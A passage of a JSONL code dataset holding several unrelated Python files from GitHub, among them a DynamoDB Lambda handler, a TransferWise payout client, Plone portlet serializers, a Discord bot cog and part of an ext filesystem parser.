triangles\n","repo_name":"huangjh-pub/neural-galerkin","sub_path":"jspsr/core/reconstructor.py","file_name":"reconstructor.py","file_ext":"py","file_size_in_byte":19561,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"51"} +{"seq_id":"22724298050","text":"\nimport boto3\nimport json\nimport logging\nimport os\nimport order\nfrom order import Order\nfrom boto3.dynamodb.conditions import Key, Attr\n\ntableName = os.environ['TABLE_NAME']\ndynamo = boto3.resource('dynamodb')\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndef lambda_handler(event, context):\n logger.info(event)\n\n size = 10\n if 'size' in event.keys():\n size = event['size']\n\n status = ''\n if 'status' in event.keys():\n status = event['status']\n\n page = 0\n if 'page' in event.keys():\n page = event['page']\n\n sortKey = 'created_on'\n if 'sortKey' in event.keys():\n sortKey = event['sortKey']\n\n asc = True\n if 'asc' in event.keys():\n asc = event['asc'] == '1'\n\n return query_orders(status, page, size, sortKey, asc)\n\n\ndef query_orders(status, page, size, sortKey, asc):\n table = dynamo.Table(tableName)\n response = table.query(\n IndexName='statusIndex',\n KeyConditionExpression=Key('orderStatus').eq(status)\n )\n logging.info(response)\n items = response['Items']\n orders = []\n\n for item in items:\n orders.append(Order.from_json(item).to_item())\n\n logging.info(orders)\n\n return orders\n\n\n","repo_name":"MaikBluemel/aJourneyToServerlessComputing","sub_path":"backend/getOrders.py","file_name":"getOrders.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35205976184","text":"import os\nimport requests\nimport json\nfrom mrsneaker_main.models import Account, Order, Bank, product_reserve, fees, Card, Shipping, open_offer\n\n\n\nimport OpenSSL\nfrom OpenSSL import crypto\nimport base64\n\n\nclass InternationalPayment:\n\n def __init__(self):\n\n self.quote_id = None\n self.customer_id = None\n self.transfer_id = None\n self.API_TOKEN = ''\n self.profile = ''\n self.order = None\n\n def order_type(self,order):\n\n order_number = ''\n\n if order.sell_sneakers == True:\n order_number = 'MRR' + order.order_number[1:]\n\n if order.consign_sneakers == True:\n order_number = 'MRC' + order.order_number[1:]\n\n return order_number\n\n\n\n def create_quote(self,currency_code,order):\n\n fee_objects = fees.objects.all()\n fee_object = fee_objects.last()\n\n transaction_fee = (float(order.price) / 100) * float(fee_object.transaction_fee)\n processing_fee = (float(order.price) / 100) * float(fee_object.processing_fee)\n\n if currency_code == 'USD':\n\n if order.consign_sneakers == True:\n price = (float(order.price) / 100)\n price = float(payout * 80.0)\n p = (0.35 / 100) * p\n price = float(float(price) + p + 0.35)\n\n else:\n\n p = float(order.price)\n p = (0.35 / 100) * p\n price = float(float(order.price) + p + 0.35)\n\n if currency_code == 'EUR':\n\n if order.consign_sneakers == True:\n price = (float(order.price) / 100)\n price = float(payout * 80.0)\n p = (0.35 / 100) * p\n price = float(float(price) + p + 0.20)\n\n\n\n else:\n p = float(order.price)\n p = (0.35 / 100) * p\n price = float(float(order.price) + p + 0.20)\n\n\n\n\n\n\n\n\n url = 'https://api.transferwise.com/v2/quotes'\n\n data = {\n \"sourceCurrency\": \"GBP\",\n \"targetCurrency\": currency_code,\n \"sourceAmount\": price,\n \"targetAmount\": None,\n \"profile\": self.profile,\n }\n\n\n data = json.dumps(data)\n\n result = requests.post(url,\n headers={'Content-Type':'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data = data)\n\n\n\n data = json.loads(result.text)\n quote_id = data['id']\n\n self.quote_id = quote_id\n self.order = order\n\n print('QUOTE CREATED')\n\n\n\n def create_recipient(self,currency_code,bank,user):\n\n shipping = Shipping.objects.all().filter(email = user.email).first()\n\n if shipping.country == 'United States':\n\n data = {\n \"profile\": self.profile,\n \"accountHolderName\": user.first_name + ' ' + user.last_name,\n \"currency\": currency_code,\n \"type\": \"aba\",\n \"details\": {\n \"legalType\": \"PRIVATE\",\n \"abartn\": bank.routing_number,\n \"accountNumber\": bank.account_number,\n \"accountType\": \"CHECKING\",\n \"address\": {\n \"country\": \"GB\",\n \"city\": \"London\",\n \"postCode\": \"10025\",\n \"firstLine\": \"50 Branson Ave\"\n }\n }\n\n }\n\n else:\n\n data = {\n \"profile\": self.profile,\n \"accountHolderName\": user.first_name + ' ' + user.last_name,\n \"currency\": currency_code,\n \"type\": \"iban\",\n \"details\": {\n \"legalType\": \"PRIVATE\",\n \"iban\": bank.iban,\n \"address\": {\n \"country\": \"GB\",\n \"city\": \"London\",\n \"postCode\": \"10025\",\n \"firstLine\": \"50 Branson Ave\"\n }\n }\n\n }\n\n\n data = json.dumps(data)\n\n url = 'https://api.transferwise.com/v1/accounts'\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data=data)\n\n print(result)\n print(result.text)\n\n\n data = json.loads(result.text)\n\n self.customer_id = data['id']\n\n\n\n\n\n def create_transfer(self):\n\n import uuid\n\n order_number = self.order_type(self.order)\n\n\n\n data = {\n \"targetAccount\": self.customer_id,\n \"quoteUuid\": self.quote_id,\n \"customerTransactionId\": str(uuid.uuid4()),\n \"details\" : {\n \"reference\": order_number,\n \"transferPurpose\": \"verification.transfers.purpose.pay.bills\",\n \"sourceOfFunds\": \"verification.source.of.funds.other\"\n }\n }\n\n data = json.dumps(data)\n\n url = 'https://api.transferwise.com/v1/transfers'\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data=data)\n\n\n data = json.loads(result.text)\n\n print(result.text)\n\n self.transfer_id = data['id']\n\n\n\n def fund_transfer(self):\n\n data = {\n \"type\": \"BALANCE\"\n }\n\n data = json.dumps(data)\n\n\n url = 'https://api.transferwise.com/v3/profiles/' + str(self.profile) + '/transfers/'+ str(self.transfer_id) +'/payments'\n\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data=data)\n\n approval = result.headers['x-2fa-approval']\n\n key_file = open(\"private.pem\", \"rb\")\n key = key_file.read()\n key_file.close()\n\n pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key)\n\n\n dataBytes = bytes(approval, encoding='ascii')\n\n signData = OpenSSL.crypto.sign(pkey, dataBytes, \"sha256\")\n\n encodedData = base64.b64encode(signData)\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN),'x-2fa-approval': approval, 'X-Signature': encodedData}, data=data)\n\n\n print(result)\n print(result.text)\n print(result.headers)\n\n\n\n\n\n\n\n","repo_name":"ck381/MrSneaker","sub_path":"international_payments.py","file_name":"international_payments.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15984002712","text":"s1 = \"A aaaa bb c\"\ns2 = \"& aaa bbb c d\"\n\nd1 = {}\nd2 = {}\n\ndef alpha_count(s):\n d = {}\n for e in s:\n if e.isalpha() and e.islower():\n if e in d:\n d[e] = d[e] + 1\n else:\n d[e] = 1\n return d\n\ndef print_data(d):\n s = ''\n for e in d:\n if s != '':\n s = s + ', '\n s = s + str(d[e]) + \" '\" + e + \"'\"\n return s\n\nprint(\"s1 has \", print_data(alpha_count(s1)))\nprint(\"s2 has \", print_data(alpha_count(s2)))","repo_name":"aditya17aug/HackerRankCoding","sub_path":"codewars1.py","file_name":"codewars1.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11515713734","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nx = np.linspace(0,5,11)\ny = x ** 2\n\n\n# In[2]:\n\n\nplt.plot(x,y,'r-')\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"X vs Y\")\nplt.show()\n\n\n# In[3]:\n\n\nplt.subplot(1,3,1)\nplt.plot(x,y,'r')\nplt.subplot(1,3,2)\nplt.plot(y,x,'b')\nplt.subplot(1,3,3)\nplt.plot(y,x ** .4,'g')\nplt.show()\n\n\n# In[4]:\n\n\nfig = plt.figure()\naxes = fig.add_axes([0.1,0.1,0.8,0.8])\naxes.set_xlabel(\"X Label\")\naxes.set_ylabel(\"Y Label\")\naxes.plot(x,y)\n\n\n# In[5]:\n\n\nfig = plt.figure()\naxes1 = fig.add_axes([0.1,0.1,0.8,0.8])\naxes2 = fig.add_axes([0.4,0.4,0.42,0.42])\naxes2.set_xlabel(\"X\")\naxes2.set_ylabel(\"Y\")\naxes1.plot()\naxes2.plot()\naxes1\n\n\n# In[12]:\n\n\nfig1,axes = plt.subplots(nrows = 1, ncols = 2)\naxes[0].plot(x,y)\naxes[1].plot(x,y)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ABPande/MyPythonRepo","sub_path":"Python/Basics/py_R3/Matplotlib.py","file_name":"Matplotlib.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3837458350","text":"# -*- coding: utf-8 -*-\n\"\"\" portlets init \"\"\"\n\nimport logging\nfrom plone import api\nfrom plone.app.portlets.interfaces import IPortletTypeInterface\nfrom plone.app.textfield.interfaces import IRichText\nfrom plone.memoize import forever\nfrom plone.portlets.interfaces import IPortletAssignment\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletRetriever\nfrom plone.portlets.utils import hashPortletInfo\nfrom plone.restapi.interfaces import IFieldSerializer\nfrom plone.restapi.interfaces import ISerializeToJson\nfrom plone.restapi.interfaces import ISerializeToJsonSummary\nfrom plone.restapi.serializer.converters import json_compatible\nfrom plone.restapi.serializer.dxfields import DefaultFieldSerializer\nfrom ZODB.POSException import ConflictError\nfrom zope.component import adapter\nfrom zope.component import getMultiAdapter\nfrom zope.component import getUtilitiesFor\nfrom zope.component import queryMultiAdapter\nfrom zope.interface import implementer\nfrom zope.interface import Interface\nfrom zope.interface import providedBy\nfrom zope.publisher.interfaces import IRequest\nfrom zope.schema import getFields\nfrom zope.schema.interfaces import IField\n\n\n# import six\n\n\nlogger = logging.getLogger(__name__)\n\nSERVICE_ID = '@portlets'\n\n\n@implementer(ISerializeToJsonSummary)\n@adapter(IPortletManager, Interface, IRequest)\nclass PortletManagerSummarySerializer(object):\n \"\"\" Portlet manager summary serializer \"\"\"\n\n def __init__(self, manager, context, request):\n self.manager = manager\n self.context = context\n self.request = request\n\n def __call__(self):\n manager_id = self.manager.__name__\n\n content_url = self.context.absolute_url()\n url = '{0}/{1}/{2}'.format(content_url, SERVICE_ID, manager_id)\n\n return {\n '@id': url,\n 'manager': manager_id,\n }\n\n\n@implementer(ISerializeToJson)\n@adapter(IPortletManager, Interface, IRequest)\nclass PortletManagerSerializer(object):\n \"\"\" Portlet manager serializer \"\"\"\n\n def __init__(self, manager, context, request):\n self.manager = manager\n self.context = context\n self.request = request\n\n def filter(self, portlets):\n \"\"\" Check available of the assignment.\n We currently\n do not use the renderer, but\n this frequently have an available property too,\n hiding lists if they have no items.\n What can we do about that? Get hold of the renderer? \"\"\"\n filtered = []\n\n for p in portlets:\n try:\n if p['assignment'].available:\n filtered.append(p)\n except ConflictError:\n raise\n except Exception as e:\n logger.exception(\n 'Error while determining assignment availability of '\n 'portlet (%r %r %r): %s', p['category'], p['key'],\n p['name'], str(e))\n\n return filtered\n\n def __call__(self):\n result = {}\n\n manager_id = self.manager.__name__\n\n content_url = self.context.absolute_url()\n url = '{0}/{1}/{2}'.format(content_url, SERVICE_ID, manager_id)\n\n result = {\n '@id': url,\n 'manager': manager_id,\n 'portlets': [],\n }\n\n retriever = getMultiAdapter((self.context, self.manager),\n IPortletRetriever)\n # The retriever only returns portlets that are visible.\n # Still need to check available.\n\n # Based on\n # plone.portlets.manager.PortletManagerRenderer._lazyLoadPortlets\n\n for portlet in self.filter(retriever.getPortlets()):\n assignment = portlet['assignment']\n\n info = portlet.copy()\n info['manager'] = manager_id\n hashPortletInfo(info)\n\n assignment.__portlet_metadata__ = {\n 'key': portlet['key'],\n 'category': portlet['category'],\n 'name': portlet['name'],\n 'manager': manager_id,\n 'hash': info['hash'],\n }\n\n # To be able to customize serializers per portlet type, we try to\n # lookup for a named adapter first. The name is the portlet type\n\n # the serializer should ideally have the same discriminators\n # as the portlet renderer: context, request, view=service, manager,\n # data.\n type_ = get_portlet_info(assignment)[0]\n serializer = queryMultiAdapter(\n (assignment, self.context, self.request),\n ISerializeToJson,\n name=type_\n )\n\n if not serializer:\n serializer = queryMultiAdapter(\n (assignment, self.context, self.request),\n ISerializeToJson\n )\n\n if not serializer:\n logger.warn(\n 'No serializer for portlet (%r %r %r)',\n portlet['category'], portlet['key'], portlet['name'])\n\n continue\n\n portlet_json = serializer()\n\n if portlet_json:\n result['portlets'].append(portlet_json)\n return result\n\n\n@forever.memoize\ndef getPortletSchemata(): # noqa\n \"\"\" get portlet schemata \"\"\"\n return dict([(iface, name)\n for name, iface\n in getUtilitiesFor(IPortletTypeInterface)])\n\n\ndef get_portlet_info(assignment):\n \"\"\" Returns the portlet type (like portlet.Navigation) and schema\n \"\"\"\n\n # Adapted from\n # plone.app.portlets.exportimport.portlets._extractPortlets\n portlet_schemata = getPortletSchemata()\n type_ = None\n schema = None\n\n for schema in providedBy(assignment).flattened():\n type_ = portlet_schemata.get(schema, None)\n\n if type_ is not None:\n break\n\n return type_, schema\n\n\n@implementer(ISerializeToJson)\n@adapter(IPortletAssignment, Interface, IRequest)\nclass PortletSerializer(object):\n \"\"\" portlet serializer \"\"\"\n\n def __init__(self, assignment, context, request):\n self.assignment = assignment\n self.context = context\n self.request = request\n\n def __call__(self):\n\n if not getattr(self.assignment, '__portlet_metadata__', False):\n return None\n\n portlet_metadata = self.assignment.__portlet_metadata__\n\n content_url = self.context.absolute_url()\n url = '{0}/@portlets/{1}/{2}'.format(\n content_url,\n portlet_metadata['manager'],\n portlet_metadata['name'])\n\n phash = portlet_metadata['hash']\n\n if isinstance(phash, bytes):\n phash = phash.decode(\"utf8\")\n\n result = {\n '@id': url,\n 'portlet_id': portlet_metadata['name'],\n 'portlet_manager': portlet_metadata['manager'],\n 'portlet_category': portlet_metadata['category'],\n 'portlet_key': portlet_metadata['key'],\n 'portlet_hash': phash,\n }\n\n type_, schema = get_portlet_info(self.assignment)\n\n if type_ is not None:\n\n type_filter = None\n\n if 'type' in self.request.form.keys():\n type_filter = self.request.form.get('type')\n\n if not isinstance(type_filter, (list, tuple)):\n type_filter = [type_filter]\n\n if type_filter and type_ not in type_filter:\n return None\n\n result['@type'] = type_\n data = self.assignment.data\n\n transformer_context = api.portal.get()\n\n if portlet_metadata['category'] == 'context':\n assignment_context_path = portlet_metadata['key']\n assignment_context = self.context.unrestrictedTraverse(\n assignment_context_path)\n transformer_context = assignment_context\n\n for name, field in getFields(schema).items():\n try:\n # todo: portlet schema permissions?\n serializer = queryMultiAdapter(\n (field, data, transformer_context, self.request),\n IFieldSerializer)\n value = serializer()\n result[json_compatible(name)] = value\n except ConflictError:\n raise\n except Exception as e:\n logger.exception(\n 'Error while serializing '\n 'portlet (%r %r %r), field %s: %s',\n portlet_metadata['category'],\n portlet_metadata['key'],\n portlet_metadata['name'],\n str(name),\n str(e))\n\n return result\n\n\n# See serializer/dxfields.py: The portlet fields\n# needs both the portletdataprovider\n# as well as the context. So we extend the\n# default dexterity field serializers.\n\n\n@adapter(IField, IPortletDataProvider, Interface, Interface)\n@implementer(IFieldSerializer)\nclass DefaultPortletFieldSerializer(DefaultFieldSerializer):\n \"\"\" default portlet field serializer \"\"\"\n\n def __init__(self, field, portletdata, context, request):\n self.field = field\n self.portletdata = portletdata\n self.context = context\n self.request = request\n\n def get_value(self, default=None):\n \"\"\" get value \"\"\"\n return getattr(self.field.interface(self.portletdata),\n self.field.__name__,\n default)\n\n\n@adapter(IRichText, IPortletDataProvider, Interface, Interface)\nclass RichttextPortletFieldSerializer(DefaultPortletFieldSerializer):\n \"\"\" Rich text portlet field serializer \"\"\"\n def __call__(self):\n value = self.get_value()\n # self.context is the transform context of the portlet:\n\n return json_compatible(value, self.context)\n","repo_name":"eea/eea.restapi","sub_path":"src/eea/restapi/serializer/portlets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"35772589668","text":"# Posição e velocidade inicial\np = PVector(10, 500)\nv = PVector(200, 0)\n# Gravidade\ng = PVector(0, -9.8)\nf = 0.01 #constante da força de retardo\n# Limites da tela\nxmin = 5\nxmax = 700\nymin = 0\nymax = 550\n\noldt = millis()/1000.0 #instante inicial\n\n\n\ndef setup():\n size(800,800)\n rectMode(CORNERS)\n \ndef draw():\n global oldt,p, v\n #cálculo da força de retardo para o corpo 1\n F = v.copy()\n F.mult(-f)\n #força total sobre o corpo 1\n F.add(g)\n #tempo transcorrido desde último desenho\n t = millis()/1000.00\n dt = t- oldt\n oldt = t\n #atualização da posição do corpo\n dp = v.copy()\n dp.mult(dt)\n p.add(dp)\n #variação de velocidade (força*delta(t)/masssa)\n F.mult(dt)\n #atualização da velocidade\n v.add(F)\n \n #verificação de colisão\n if p.x > xmax:\n p.x = xmax - (p.x-xmax)\n v.x = -v.x\n if p.x < xmin:\n p.x = xmin + (xmin - p.x)\n v.x = -v.x\n if p.y > ymax:\n p.y = ymax - (p.y - ymax)\n v.y = -v.y\n if p.y < ymin:\n p.y = ymin + (ymin - p.y)\n v.y = -v.y\n \n \n \n\n\n \n #desenho dos sorpos \n background(225)\n fill(255,0,0)\n ellipse(p.x, 600- p.y, 10, 10)\n noFill()\n strokeWeight(3)\n stroke(0)\n rect(xmin, 600 - ymax, xmax, 600 - ymin)\n noStroke()","repo_name":"carolmcs/angrybirds","sub_path":"projetil_com_colisao/projetil_com_colisao.pyde","file_name":"projetil_com_colisao.pyde","file_ext":"pyde","file_size_in_byte":1335,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"23221848523","text":"import copy\ndef getStrCombinations(str,i,current_str,ans_arr=[]):\n if(i==len(str)):\n ans_arr.append(current_str)\n return\n getStrCombinations(str,i+1,current_str+str[i],ans_arr)\n getStrCombinations(str,i+1,current_str,ans_arr)\n return ans_arr\n\ndef permute(nums):\n if(len(nums)<2):\n return [nums]\n return getStrPermutation(nums,0,len(nums)-1)\n\ndef getStrPermutation(strArr,l,r,arr=[]):\n if(l==r):\n arr.append([s for s in strArr])\n return\n for i in range(l,r+1):\n swap(strArr,l,i)\n getStrPermutation(strArr,l+1,r,arr)\n swap(strArr,l,i)\n return arr\ndef swap(a,x,y):\n a[x],a[y]=a[y],a[x]\n return a\narr=[x for x in \"123\"]\nres=permute(arr)\nprint()\nfor r in res:\n print(r)","repo_name":"prashantsingh003/Data-Structures","sub_path":"general-questions/Permutation_Combination_str.py","file_name":"Permutation_Combination_str.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1590415276","text":"import discord\nimport io\nfrom discord.ext import commands\nfrom PIL import Image\nimport sqlite3\nimport random\nimport json\nfrom discord import app_commands\nimport asyncio\n\nintents = discord.Intents.all()\nintents.messages = True\n\nbot = commands.Bot(command_prefix=\"/\", intents=intents)\n\n\nconnection = sqlite3.connect('viperdevmac.db')\nc = connection.cursor()\n\n\nclass allcharacters(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n @bot.tree.command(name=\"allcharacters\", description=\"View all characters records in SpaceAddicts and Rontacklebox collection\")\n async def allcharacters(self, interaction):\n # Execute a SELECT statement to retrieve all names from the database\n c.execute(\"SELECT name, 'Space Addicts' as source FROM spaceaddicts UNION SELECT name, 'Ron Tacklebox' as source FROM ront UNION SELECT name, 'Shop' as source FROM shop\")\n results = c.fetchall()\n\n # If results are found, create a list of names and send it to the user via an ephemeral message in the channel\n if results:\n # Format the results into a dictionary, where the key is the source and the value is a list of names from that source\n formatted_results = {}\n for name, source in results:\n if source not in formatted_results:\n formatted_results[source] = []\n formatted_results[source].append(name)\n\n # Create a message with the formatted results\n message = ''\n for source, names in formatted_results.items():\n message += f'\\n{source.upper()}:\\n' + '\\n'.join(names) + '\\n'\n\n # Split the message into chunks of 2000 characters and send each chunk as an ephemeral message\n chunks = [message[i:i+2000] for i in range(0, len(message), 2000)]\n for chunk in chunks:\n embed = discord.Embed(title='Names in Databases', description=chunk, color=0x00ff00)\n await interaction.response.send_message(embed=embed, ephemeral=True)\n else:\n # If no results are found, send a message in the channel indicating that there are no names in the databases\n embed = discord.Embed(title='Names in Databases', description='There are no names in the databases.', color=0xff0000)\n await interaction.response.send_message(embed=embed, ephemeral=True)\n\n \n \n\nasync def setup(bot):\n await bot.add_cog(allcharacters(bot))\n\n","repo_name":"Stratuscodelab/Yurrobot-V3-COG","sub_path":"cogs/allcharacters.py","file_name":"allcharacters.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20484154899","text":"import os\r\nimport shutil\r\n\r\n#定义数据删除器\r\ndef deldata(ininame,delnum):\r\n load = open('%s.ini' %ininame,'r')\r\n read = load.readlines()[10]\r\n leno = len(str(read))\r\n read = read.split(', ')\r\n delnum = str(delnum)\r\n delnum = delnum.replace('\\'', '')\r\n read.remove(delnum)\r\n write = read\r\n lenth = len(write)\r\n k = 0\r\n delstr = ''\r\n while k < lenth:\r\n delstr = delstr + write[k] + ', '\r\n k = k + 1\r\n else:\r\n delstr = delstr.rstrip(', ')\r\n load.close()\r\n load2nd = open('%s.ini' %ininame,'rb+')\r\n load2nd.seek(-leno,2)\r\n load2nd.truncate()\r\n load2nd.close()\r\n load3rd = open('%s.ini' %ininame,'r+')\r\n load3rd.seek(0,2)\r\n load3rd.write(delstr)\r\n load3rd.close()","repo_name":"Ariczh/MoneySaver","sub_path":"parts/dele.py","file_name":"dele.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72733401437","text":"from setuptools import setup\nimport os\nimport re\n\n\nwith open(os.path.join(os.path.abspath(os.path.dirname(\n __file__)), 'cbpi4ui', 'version.py'), 'r', encoding='latin1') as fp:\n try:\n match = re.search('.*\\\"(.*)\\\"', fp.readline())\n version = match.group(1)\n except IndexError:\n raise RuntimeError('Unable to determine version.')\n\n\nprint(version)\n\nsetup(name='cbpi4ui',\n version=version,\n description='CraftBeerPi User Interface',\n author='Manuel Fritsch',\n author_email='manuel@craftbeerpi.com',\n url='http://web.craftbeerpi.com',\n include_package_data=True,\n package_data={\n # If any package contains *.txt or *.rst files, include them:\n '': ['*.txt', '*.rst', '*.yaml'],\n 'cbpi4-ui-plugin': ['*','*.txt', '*.rst', '*.yaml']},\n packages=['cbpi4ui'],\n )\n","repo_name":"craftbeerpi/craftbeerpi4-ui","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"16184036565","text":"from __future__ import annotations\n\nimport io\nimport logging\nimport os\nimport stat\nfrom datetime import datetime\nfrom functools import lru_cache\nfrom typing import BinaryIO, Iterator, Optional, Union\nfrom uuid import UUID\n\nfrom dissect.cstruct import Instance\nfrom dissect.util import ts\nfrom dissect.util.stream import RangeStream, RunlistStream\n\nfrom dissect.extfs.c_ext import (\n EXT2,\n EXT3,\n EXT4,\n FILETYPES,\n XATTR_NAME_MAP,\n XATTR_PREFIX_MAP,\n c_ext,\n)\nfrom dissect.extfs.exceptions import (\n Error,\n FileNotFoundError,\n NotADirectoryError,\n NotASymlinkError,\n)\nfrom dissect.extfs.journal import JDB2\n\nlog = logging.getLogger(__name__)\nlog.setLevel(os.getenv(\"DISSECT_LOG_EXTFS\", \"CRITICAL\"))\n\n\nclass ExtFS:\n def __init__(self, fh: BinaryIO):\n self.fh = fh\n # self._path_cache = {}\n self._journal = None\n\n fh.seek(c_ext.EXT2_SBOFF)\n sb = c_ext.ext4_super_block(fh)\n self.sb = sb\n\n if sb.s_magic != c_ext.EXT2_FS_MAGIC:\n raise Error(\"Not a valid ExtFS filesystem (magic mismatch)\")\n\n if sb.s_inodes_count < 10:\n raise Error(\"Not a valid ExtFS filesystem (inum count < 10)\")\n\n if sb.s_blocks_per_group == 0 or sb.s_inodes_per_group == 0:\n raise Error(\"Not a valid ExtFS filesystem (blocks or inodes per group is 0)\")\n\n if sb.s_log_block_size != sb.s_log_cluster_size:\n raise NotImplementedError(\"Different size cluster than blocks is currently not supported\")\n\n self.block_size = c_ext.EXT2_MIN_BLOCK_SIZE << sb.s_log_block_size\n if self.block_size == 0 or self.block_size % 512:\n raise Error(\"Not a valid ExtFS filesystem (invalid block size)\")\n\n if sb.s_feature_incompat & c_ext.EXT4_FEATURE_INCOMPAT_EXTENTS:\n self.type = EXT4\n elif sb.s_feature_compat & c_ext.EXT3_FEATURE_COMPAT_HAS_JOURNAL:\n self.type = EXT3\n else:\n self.type = EXT2\n\n if sb.s_feature_incompat & c_ext.EXT2_FEATURE_INCOMPAT_FILETYPE:\n self._dirtype = c_ext.ext2_dir_entry_2\n else:\n self._dirtype = c_ext.ext2_dir_entry\n\n self.block_count = (sb.s_blocks_count_hi << 32) | sb.s_blocks_count_lo\n self.last_block = self.block_count - 1\n\n if (\n self.type == EXT4\n and self.sb.s_feature_incompat & c_ext.EXT4_FEATURE_INCOMPAT_64BIT\n and self.sb.s_desc_size >= 64\n ):\n self._group_desc_struct = c_ext.ext4_group_desc\n else:\n self._group_desc_struct = c_ext.ext2_group_desc\n self._group_desc_size = sb.s_desc_size if sb.s_desc_size else len(self._group_desc_struct)\n\n goff = c_ext.EXT2_SBOFF + self._group_desc_size\n self.groups_offset = goff if goff % self.block_size == 0 else goff + self.block_size - goff % self.block_size\n self.groups_count = ((self.last_block - sb.s_first_data_block) // sb.s_blocks_per_group) + 1\n\n self.uuid = UUID(bytes=sb.s_uuid)\n self.last_mount = sb.s_last_mounted.split(b\"\\x00\")[0].decode(errors=\"surrogateescape\")\n\n self.root = self.get_inode(c_ext.EXT2_ROOT_INO, \"/\")\n\n self.get_inode = lru_cache(1024)(self.get_inode)\n self._read_group_desc = lru_cache(356)(self._read_group_desc)\n\n @property\n def journal(self) -> JDB2:\n if not self._journal:\n if not self.sb.s_feature_compat & c_ext.EXT3_FEATURE_COMPAT_HAS_JOURNAL:\n raise Error(\"Journal not supported\")\n\n inum = self.sb.s_journal_inum\n if inum == 0:\n raise Error(\n f\"Journal inum is 0, could be on external device (s_journal_uuid = {self.sb.s_journal_uuid})\"\n )\n\n inode = self.get_inode(inum)\n self._journal = JDB2(inode.open())\n\n return self._journal\n\n def get(self, path: Union[str, int], node: Optional[INode] = None) -> INode:\n if isinstance(path, int):\n return self.get_inode(path)\n\n node = node if node else self.root\n parts = path.split(\"/\")\n for part_num, part in enumerate(parts):\n if not part:\n continue\n\n while node.filetype == stat.S_IFLNK and part_num < len(parts):\n node = node.link_inode\n\n for entry in node.iterdir():\n if entry.filename == part:\n node = entry\n break\n else:\n raise FileNotFoundError(f\"File not found: {path}\")\n\n return node\n\n def get_inode(\n self,\n inum: int,\n filename: Optional[str] = None,\n filetype: Optional[int] = None,\n parent: Optional[INode] = None,\n lazy: bool = False,\n ) -> INode:\n if inum < c_ext.EXT2_BAD_INO or inum > self.sb.s_inodes_count:\n raise Error(f\"inum out of range {c_ext.EXT2_BAD_INO}-{self.sb.s_inodes_count}: {inum}\")\n\n inode = INode(self, inum, filename, filetype, parent=parent)\n if not lazy:\n inode._inode = inode._read_inode()\n\n return inode\n\n def _read_group_desc(self, group_num: int) -> Instance:\n if group_num >= self.groups_count:\n raise Error(\"Group number exceeds amount of groups\")\n\n offset = self.groups_offset + group_num * self._group_desc_size\n self.fh.seek(offset)\n group_desc = self._group_desc_struct(self.fh)\n\n if self._group_desc_struct == c_ext.ext4_group_desc:\n block_bitmap = (group_desc.bg_block_bitmap_hi << 32) | group_desc.bg_block_bitmap_lo\n inode_bitmap = (group_desc.bg_inode_bitmap_hi << 32) | group_desc.bg_inode_bitmap_lo\n table_block = (group_desc.bg_inode_table_hi << 32) | group_desc.bg_inode_table_lo\n else:\n block_bitmap = group_desc.bg_block_bitmap_lo\n inode_bitmap = group_desc.bg_inode_bitmap_lo\n table_block = group_desc.bg_inode_table_lo\n\n if block_bitmap > self.last_block or inode_bitmap > self.last_block or table_block > self.last_block:\n raise Error(\"Group descriptor block locations exceed last block\")\n\n return group_desc\n\n\nclass INode:\n def __init__(\n self,\n extfs: ExtFS,\n inum: int,\n filename: Optional[str] = None,\n filetype: Optional[int] = None,\n parent: Optional[INode] = None,\n ):\n self.extfs = extfs\n self.inum = inum\n self.parent = parent\n self._inode = None\n\n self.filename = filename\n self._filetype = filetype\n self._size = None\n self._link = None\n self._link_inode = None\n self._xattr = None\n\n self._dirlist = None\n self._runlist = None\n\n def __repr__(self) -> str:\n return f\"\"\n\n def _read_inode(self) -> Instance:\n block_group_num, index = divmod(self.inum - 1, self.extfs.sb.s_inodes_per_group)\n block_group = self.extfs._read_group_desc(block_group_num)\n\n if self.extfs._group_desc_struct == c_ext.ext4_group_desc:\n table_block = 